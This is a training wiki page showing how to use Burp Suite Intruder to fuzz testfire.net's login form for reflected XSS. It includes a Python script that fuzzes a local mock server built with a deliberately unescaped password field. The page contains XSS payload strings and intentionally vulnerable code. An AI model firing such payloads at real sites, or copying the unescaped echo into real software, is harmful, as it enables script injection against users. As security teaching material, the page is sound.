BURPSUITE - Nandhini148/Cyber-security-placement-training- GitHub Wiki
DAY 02
BURP SUITE
What is Burp Suite?
Burp, or Burp Suite, is a set of tools used for penetration testing of web applications. It is developed by PortSwigger and is one of the most widely used tools among professional web application security researchers and bug bounty hunters.
In this exercise we use Burp Intruder to test a login form for XSS (Cross-Site Scripting): a list of XSS payloads is substituted into one request parameter, one request per payload, and the responses are compared against a baseline.
STEPS:
- First, install and set up Burp Suite on Windows or Linux.
- In the Proxy tab, click "Open Browser". This launches Burp's embedded Chromium browser, which is already configured to send its traffic through the Burp proxy, so no manual proxy or CA certificate setup is needed.
- Browse to testfire.net (Altoro Mutual), a website created by IBM as a simulated online banking environment for education and training. It is intentionally vulnerable and meant to be tested; do not run these steps against sites you are not authorized to test.
- Navigate to the login page and fill in any username and password. Real credentials are not needed; the goal is only to capture the login request.
- Back in Burp, go to Proxy > Intercept and make sure interception is on ("Intercept is on") before submitting the form, so that the login POST is held by the proxy.
- The intercepted request appears in the Intercept tab. Its body contains the username and password parameters submitted by the form.
- Right-click the request and select "Send to Intruder" (Ctrl+I).
- Move to the Intruder tab. In the Positions sub-tab, click "Clear §" to remove the automatically placed markers, highlight the value of the password parameter, and click "Add §" so that only that value is replaced by payloads (attack type: Sniper).
- Download an XSS payload list (any public XSS wordlist will do). In the Payloads sub-tab, set the payload type to "Simple list" and use "Load ..." to import the file.
- The payloads now appear in the list; Intruder will send one request per payload, each with the marked position replaced by that payload.
- Click "Start attack". The results table fills with one row per request, showing its status code and response length. Sort by length (or status) and look for rows that deviate from the baseline; a different length means the payload changed what the server returned, often because it was reflected. Length variance alone does not prove XSS: open the response of a suspicious row and confirm that the payload appears in the HTML unencoded (the Render view shows whether it executes). Enabling "Grep - Payloads" in the Intruder settings before starting the attack flags responses that contain the submitted payload automatically.
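To make the analysis in the last step concrete, here is an added example that is not part of the original wiki page and is not Burp's or PortSwigger's code: a Python re-implementation of the Intruder Sniper attack described above, standard library only. Because it has to run offline, it starts a constructed local mock of a login page that stands in for testfire.net; the mock is hypothetical (the `uid`/`passw` field names, the `/doLogin` path and the unencoded echo of the password are choices made for the demonstration, not observed behaviour). It fuzzes one parameter with a small XSS list and records what the Intruder results table shows (status code, response length, delta from the baseline) together with the check that actually settles the question: whether the payload came back raw or HTML-encoded.

```python
"""Re-implementation of a Burp Intruder "Sniper" attack against a login form.
Added example for this page, not PortSwigger's code. The target is a constructed
local mock standing in for testfire.net (hypothetical field names and behaviour)."""
import html
import threading
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed sample payload list; in practice load a public XSS wordlist file.
XSS_PAYLOADS = [
    "<script>alert(1)</script>",
    '"><img src=x onerror=alert(1)>',
    "'><svg onload=alert(1)>",
]


class _MockLoginHandler(BaseHTTPRequestHandler):
    """Constructed vulnerable target: echoes both fields into the error page.
    The username is HTML-escaped (safe); the password is not (reflected XSS)."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        params = urllib.parse.parse_qs(self.rfile.read(length).decode("utf-8", "replace"))
        uid = params.get("uid", [""])[0]
        passw = params.get("passw", [""])[0]
        page = (
            "<html><body><h1>Login Failed</h1>"
            f"<p>Unknown user: {html.escape(uid)}</p>"
            f"<p>Rejected password: {passw}</p>"  # written raw on purpose
            "</body></html>"
        ).encode()
        self.send_response(200)
        self.send_header("Content-Type", "text/html; charset=utf-8")
        self.send_header("Content-Length", str(len(page)))
        self.end_headers()
        self.wfile.write(page)

    def log_message(self, *args):  # keep the console clean
        pass


def start_mock_server():
    """Start the mock target on an ephemeral loopback port; return (url, server)."""
    server = HTTPServer(("127.0.0.1", 0), _MockLoginHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return f"http://127.0.0.1:{server.server_port}/doLogin", server


def send_login(url, params):
    """POST one login attempt (like the intercepted request); return (status, body)."""
    data = urllib.parse.urlencode(params).encode()
    req = urllib.request.Request(url, data=data, method="POST")
    with urllib.request.urlopen(req, timeout=5) as resp:
        return resp.status, resp.read().decode("utf-8", "replace")


def sniper_attack(url, position, payloads, base=None):
    """Sniper mode for one marked position: a baseline request, then one request
    per payload with only `position` replaced. Each result carries what the
    Intruder table shows (status, length, delta vs. baseline) plus the check that
    proves reflected XSS: the payload present verbatim, not only HTML-encoded."""
    base = dict(base or {"uid": "alice", "passw": "Password1"})
    _, baseline_body = send_login(url, base)
    results = []
    for payload in payloads:
        params = dict(base)
        params[position] = payload
        status, body = send_login(url, params)
        results.append({
            "payload": payload,
            "status": status,
            "length": len(body),
            "delta": len(body) - len(baseline_body),
            "reflected_raw": payload in body,
            "reflected_encoded": payload not in body and html.escape(payload) in body,
        })
    return results


if __name__ == "__main__":
    target, server = start_mock_server()
    for position in ("uid", "passw"):
        print(f"\nPayload position: {position}")
        for r in sniper_attack(target, position, XSS_PAYLOADS):
            verdict = "RAW reflection -> XSS" if r["reflected_raw"] else "encoded only"
            print(f"{r['status']}  len={r['length']:4d}  delta={r['delta']:+4d}  {verdict:22s} {r['payload']}")
    server.shutdown()
```

Running the script fuzzes both positions of the mock. Fuzzing `uid` produces the same kind of length variance as fuzzing `passw`, yet every reflection there is HTML-encoded and harmless; only the `passw` position reflects the payload raw. This is exactly why the length column in Intruder is a way to find candidates, while the response itself (or the Grep - Payloads flag) is what confirms the finding.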